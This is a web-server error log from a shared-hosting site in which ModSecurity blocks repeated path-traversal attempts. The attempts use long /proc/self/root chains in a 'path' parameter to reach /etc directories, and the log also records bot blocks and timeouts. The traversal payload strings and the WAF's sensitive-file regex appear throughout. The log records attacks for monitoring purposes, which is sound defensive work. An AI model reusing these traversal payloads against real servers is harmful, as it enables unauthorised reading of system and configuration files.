[Tue Mar 17 19:51:03.680205 2026] [:error] [pid 2598:tid 140411590858496] [client 74.7.241.31:34448] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abna1xj0p0SRWAqcjGGaRwAAAxI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 19:51:06.177785 2026] [:error] [pid 7004:tid 140411741927168] [client 74.7.241.31:47638] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abna2sU6Sx0TG1YjmQjPrQAAAoA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 19:51:14.125811 2026] [proxy_fcgi:error] [pid 11088:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:50864] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:51:36.045855 2026] [proxy_fcgi:error] [pid 26799:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:51214] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:51:58.121865 2026] [proxy_fcgi:error] [pid 7004:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:51440] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:52:34.053900 2026] [proxy_fcgi:error] [pid 6296:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:51888] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:52:56.025799 2026] [proxy_fcgi:error] [pid 7004:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:52132] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:53:18.137793 2026] [proxy_fcgi:error] [pid 31803:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:52356] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:53:39.793861 2026] [proxy_fcgi:error] [pid 25836:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:52668] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:54:02.133821 2026] [proxy_fcgi:error] [pid 26799:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:52958] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:54:25.101826 2026] [proxy_fcgi:error] [pid 11088:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:53264] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:54:28.779059 2026] [:error] [pid 7004:tid 140411658000128] [client 74.7.243.128:46272] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnbpMU6Sx0TG1YjmQjP9wAAAoo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 19:54:48.133830 2026] [proxy_fcgi:error] [pid 31803:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:53562] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:55:10.129859 2026] [proxy_fcgi:error] [pid 11816:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:53832] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:55:32.141761 2026] [proxy_fcgi:error] [pid 6296:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:54202] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:55:55.125882 2026] [proxy_fcgi:error] [pid 6296:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:54660] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:56:17.033814 2026] [proxy_fcgi:error] [pid 11088:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:55094] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:56:39.121787 2026] [proxy_fcgi:error] [pid 6296:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:55480] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:57:02.157792 2026] [proxy_fcgi:error] [pid 11088:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:55766] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:57:24.129774 2026] [proxy_fcgi:error] [pid 2598:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:55984] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:57:27.371075 2026] [:error] [pid 19507:tid 140411616036608] [client 74.7.243.128:53128] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abncV9Y0UrI5A3LftIwfzQAAAY8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 19:57:37.539204 2026] [:error] [pid 7004:tid 140411658000128] [client 74.7.228.61:39364] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abncYcU6Sx0TG1YjmQjQOQAAAoo"]
[Tue Mar 17 19:57:37.714365 2026] [:error] [pid 7004:tid 140411741927168] [client 74.7.244.43:35016] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abncYcU6Sx0TG1YjmQjQOgAAAoA"]
[Tue Mar 17 19:57:57.123463 2026] [proxy_fcgi:error] [pid 26799:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:56402] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:57:58.921851 2026] [mime_magic:error] [pid 6296:tid 140411607643904] (70014)End of file found: [client 74.7.241.31:47812] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/usr/lib/firmware
[Tue Mar 17 19:58:17.501234 2026] [:error] [pid 25836:tid 140411607643904] [client 74.7.243.128:38536] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnciYh-PF_25v4hFRCLDgAAARA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 19:58:20.129210 2026] [proxy_fcgi:error] [pid 6296:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:56682] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:58:42.125876 2026] [proxy_fcgi:error] [pid 19507:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:56874] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:59:05.129628 2026] [proxy_fcgi:error] [pid 6296:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:57136] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:59:28.120869 2026] [proxy_fcgi:error] [pid 19507:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:57480] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:59:50.121981 2026] [proxy_fcgi:error] [pid 11816:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:57764] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:59:58.612284 2026] [mime_magic:error] [pid 6296:tid 140411666392832] (70014)End of file found: [client 74.7.241.31:59088] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/opt/bacula
[Tue Mar 17 20:00:13.130343 2026] [proxy_fcgi:error] [pid 26799:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:58118] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:00:18.054280 2026] [mime_magic:error] [pid 29151:tid 140411708356352] (70014)End of file found: [client 74.7.243.128:42684] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/lib
[Tue Mar 17 20:00:18.054645 2026] [access_compat:error] [pid 29151:tid 140411708356352] [client 74.7.243.128:42684] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php5, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/lib
[Tue Mar 17 20:00:35.126723 2026] [proxy_fcgi:error] [pid 11088:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:58424] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:00:38.316368 2026] [:error] [pid 25836:tid 140411565680384] [client 74.7.241.31:51854] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abndFoh-PF_25v4hFRCLPwAAARU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 20:01:00.147375 2026] [proxy_fcgi:error] [pid 6296:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:58768] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:01:22.030140 2026] [proxy_fcgi:error] [pid 7004:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:59062] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:01:43.085823 2026] [proxy_fcgi:error] [pid 29151:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:59520] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:01:51.519228 2026] [:error] [pid 2598:tid 140411590858496] [client 74.7.243.128:47124] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abndXxj0p0SRWAqcjGGbBgAAAxI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 20:02:05.224901 2026] [proxy_fcgi:error] [pid 7004:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:59976] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:02:09.655700 2026] [:error] [pid 26799:tid 140411607643904] [client 74.7.243.128:35962] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abndcda6ubjKNq_cu4YobgAAA1A"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 20:02:27.121857 2026] [proxy_fcgi:error] [pid 2598:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:60638] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:02:38.991669 2026] [:error] [pid 11816:tid 140411699963648] [client 74.7.244.43:37044] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abndjuw_le52K8_3pV1ucQAAAgU"]
[Tue Mar 17 20:02:39.007276 2026] [:error] [pid 7004:tid 140411548894976] [client 74.7.228.61:60306] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abndjcU6Sx0TG1YjmQjQkAAAApc"]
[Tue Mar 17 20:02:48.124185 2026] [proxy_fcgi:error] [pid 31803:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:32774] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:03:10.121148 2026] [proxy_fcgi:error] [pid 11816:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:33138] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:03:32.125874 2026] [proxy_fcgi:error] [pid 2598:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:33448] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:03:54.125877 2026] [proxy_fcgi:error] [pid 29151:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:33852] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:03:55.193033 2026] [:error] [pid 19507:tid 140411708356352] [client 74.7.243.128:33982] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnd29Y0UrI5A3LftIwgcQAAAYQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 20:04:16.133846 2026] [proxy_fcgi:error] [pid 26799:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:34188] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:04:23.611566 2026] [:error] [pid 31803:tid 140411733534464] [client 74.7.243.128:45012] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnd9-yqAr6etmhZHNpInAAAAEE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 20:04:25.280974 2026] [:error] [pid 29151:tid 140411540502272] [client 74.7.243.128:59804] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnd-fPqhzTj3BvfDX-pigAAAdg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 20:04:38.129789 2026] [proxy_fcgi:error] [pid 11816:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:34498] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:05:00.445799 2026] [proxy_fcgi:error] [pid 7004:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:34890] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:05:23.123346 2026] [proxy_fcgi:error] [pid 19507:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:35280] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:05:45.137946 2026] [proxy_fcgi:error] [pid 11088:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:35574] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:06:07.105792 2026] [proxy_fcgi:error] [pid 7004:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:35908] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:06:29.045929 2026] [proxy_fcgi:error] [pid 19507:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:36316] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:06:52.151449 2026] [proxy_fcgi:error] [pid 7004:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:36722] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:07:14.133789 2026] [proxy_fcgi:error] [pid 11088:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:37100] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:07:19.016151 2026] [core:alert] [pid 29151:tid 140411666392832] [client 74.7.243.128:59804] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/lib/firmware
[Tue Mar 17 20:07:22.262980 2026] [:error] [pid 2598:tid 140411708356352] [client 74.7.241.31:53498] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abneqhj0p0SRWAqcjGGbvQAAAwQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 20:07:31.271583 2026] [:error] [pid 2598:tid 140411565680384] [client 74.7.241.31:53498] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnesxj0p0SRWAqcjGGbxQAAAxU"], referer: 